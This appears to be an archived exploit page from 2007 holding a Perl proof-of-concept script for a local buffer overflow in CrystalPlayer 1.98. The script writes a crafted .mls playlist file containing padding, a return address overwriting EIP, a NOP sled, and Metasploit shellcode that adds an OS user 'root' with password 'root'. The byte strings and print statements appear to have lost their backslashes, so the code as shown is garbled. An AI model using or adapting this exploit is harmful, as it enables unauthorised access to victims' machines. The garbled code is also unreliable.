CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit
# Published : 2007-07-26
# Author : Arham Muhammad
# Previous Title : PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
# Next Title : PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass

#!/usr/bin/perl
######################################################################################################################
#Crystal Player 1.98
#Playlist(.mls) File Local Buffer Overflow Exploit
#Source:: http://www.crystalplayer.com/CrystalPro.exe
#Credit To Timq For The Vulnerability
#POC By Arham Muhammad
#######################################################################################################################

#While Debugging EIP And EBP Successfully Gets Overwritten!
#Upon Successful Exploitation, DOS Occurs And It Further Destorys The Libraries,Upon Successful Exploitation
#When The Next Time App Is Executed
#It Throws Microsfot Visual C++ Runtime Library Error Followed By An Other Exception
#The POC Add user "root" with password "root" to the os!
#Tested On x86 vista enterprise ed.
#Might require Changing esp address coz of os and sp change


print "Crystal Player 1.98 Local Bufferoverflow Exploitn";
print "Creating Crafted .mls Filen";


$buff = 'A' x 1033;


$ret = "x76xF5x48x37"; #call esp in ntdll.dll



# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13xea". #Add user root with pass root 232 bytes
"x15xcdx86x83xebxfcxe2xf4x16xfdx89x86xeax15x46xc3".
"xd6x9exb1x83x92x14x22x0dxa5x0dx46xd9xcax14x26xcf".
"x61x21x46x87x04x24x0dx1fx46x91x0dxf2xedxd4x07x8b".
"xebxd7x26x72xd1x41xe9x82x9fxf0x46xd9xcex14x26xe0".
"x61x19x86x0dxb5x09xccx6dx61x09x46x87x01x9cx91xa2".
"xeexd6xfcx46x8ex9ex8dxb6x6fxd5xb5x8ax61x55xc1x0d".
"x9ax09x60x0dx82x1dx26x8fx61x95x7dx86xeax15x46xee".
"xd6x4axfcx70x8ax43x44x7ex69xd5xb6xd6x82xe5x47x82".
"xb5x7dx55x78x60x1bx9ax79x0dx76xa0xe2xc4x70xb5xe3".
"xcax3axaexa6x84x70xb9xa6x9fx66xa8xf4xcax67xa2xe9".
"x9ex35xbfxe9x85x61xedxa9xabx51x89xa6xccx33xedxe8".
"x8fx61xedxeax85x76xacxeax8dx67xa2xf3x9ax35x8cxe2".
"x87x7cxa3xefx99x61xbfxe7x9ex7axbfxf5xcax67xa2xe9".
"x9ex35xe2xc7xaex51xcdx86";


$nopsled = "x90" x 797; #Nopsled to fill the buffer



open(mls, ">./buffer.mls");
print mls "$buff";
print mls "$ret";
print mls "$nopsled";
print mls "$shellcode";


print "Crafted File Created!n";


#Arham Muhammad
#rko.thelegendkiller@ gmail.com

#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);
#Gr0undbreakerz

# www.Syue.com [2007-07-26]